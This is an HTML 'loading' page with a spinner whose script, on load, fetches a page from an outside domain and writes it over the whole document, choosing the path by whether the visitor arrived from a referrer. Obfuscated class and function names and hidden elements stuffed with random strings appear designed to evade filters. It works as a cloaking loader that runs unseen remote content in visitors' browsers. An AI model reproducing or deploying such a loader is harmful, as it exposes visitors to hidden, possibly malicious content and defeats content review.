<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SHcNd8aEx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SHcNd8aEx .rkiTSXfjHb0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SHcNd8aEx .content {
            line-height: 50px;
            text-align: center
        }

        .SHcNd8aEx .img {
            width: 100%
        }

        .SHcNd8aEx .UlPyfDej8rK {
            text-align: center
        }

        .SHcNd8aEx .UlPyfDej8rK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SHcNd8aEx .UlPyfDej8rK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SHcNd8aEx .UlPyfDej8rK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SHcNd8aEx .UlPyfDej8rK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SHcNd8aEx .UlPyfDej8rK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SHcNd8aEx .UlPyfDej8rK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SHcNd8aEx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iFHBYtwMJx2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WpYgsdE = iFHBYtwMJx2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WpYgsdE +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WpYgsdE +".html?a=share";
		}
		
        kW1NCiAA=url+"#"+new Date().getTime();
        kW1NCiAA && function() {
            $.get(kW1NCiAA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >Hn5oU2GczaJpVsLnJX5Ka2Wmx8RQrit5ZHnLaxFQqaunWBpsKnQ5B</ul>
<a  href='#' style='display:none'>JwOu8OpmYHpg</a>
<h1 style='display:none' >m2baBkpxmtdohnsAfDDsDaBH57sqqzTPg9QzqEE9IOmeXEwLZUy</h1>
<b style='display:none' >VykBv0QyPTTWDhRx6UPijp9O83Awj538TzIaGccdhOA071mOOGgSbygJKCnXpLRPmDweQb4nh</b>
<li style='display:none' >Kvuge3SUrUlovLU7zciRwLvXIowU5Bf5k</li><div class="SHcNd8aEx">
    <div class="rkiTSXfjHb0">
        <div class="UlPyfDej8rK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>YpihEz9tJYfPCl2lyFqkEqIEO6DwBM</span>
<a  href='#' style='display:none'>GAjj5EwKUNtiAK4qF5FYtQYVPHLTTLY0bRyMqVhUmpCcyXFn2G2o</a>
<a  href='#' style='display:none'>GAjj5EwKUNtiAK4qF5FYtQYVPHLTTLY0bRyMqVhUmpCcyXFn2G2o</a>
<li style='display:none' >vWoxP9e8ElR7dg5Qw4UjasPbsO6TWJddv4zGLow3hykhzrDAGHmIsO2pawTH3ava3AVDPHdTSNyDJDheWCf6LeESnmOzRsCYrqY</li></body>
</html>